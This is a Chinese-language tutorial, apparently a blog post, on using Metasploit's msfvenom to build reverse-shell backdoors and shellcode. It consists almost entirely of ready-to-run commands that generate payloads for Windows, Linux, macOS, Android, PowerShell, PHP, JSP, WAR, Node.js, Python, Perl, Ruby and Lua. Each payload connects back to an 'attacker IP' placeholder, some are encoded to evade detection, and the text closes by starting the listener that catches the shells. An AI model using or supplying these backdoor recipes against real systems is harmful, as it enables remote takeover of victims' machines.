采用MSF框架生成反弹shellcode
1. metasploit框架安装
安装命令如下:
1 | $ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall |
安装后可用命令如下
其中msfvenom可用于生成shellcode或可执行文件。参数介绍如下:
1 | Options: |
以下为msfvenom部分参数中文说明及示例
1 | 1. -p 指定payload的功能 |
2. MSF 生成各种后门
Windows: 生成Windows后门.
1 | msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe |
Linux:
1 | msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f elf -o payload.elf |
MAC OS: 生成苹果MAC后门.
1 | msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f macho -o payload.macho |
Android: 生成安卓后门,需要签名
1 | msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f apk -o payload.apk |
PowerShell: 生成PowerShell.
1 | msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1 |
PHP:
1 | msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php |
ASP.net:
1 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f aspx -o payload.aspx |
JSP:
1 | msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f raw -o payload.jsp |
War:
1 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f raw -o payload.war |
Node.js:
1 | msfvenom -p nodejs/shell_reverse_tcp LHOST=<攻击机IP> LPORT=<攻击机端口> -f raw -o payload.js |
Python:
1 | msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py |
Perl:
1 | msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl |
Ruby:
1 | msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb |
Lua:
1 | msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua |
MSF 生成ShellCode
Windows ShellCode:
1 | msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c |
linux shellcode:
1 | msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c |
mac shellcode:
1 | msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c |
MFS控制主机,启动侦听程序
1 | msf5 > use exploit/multi/handler |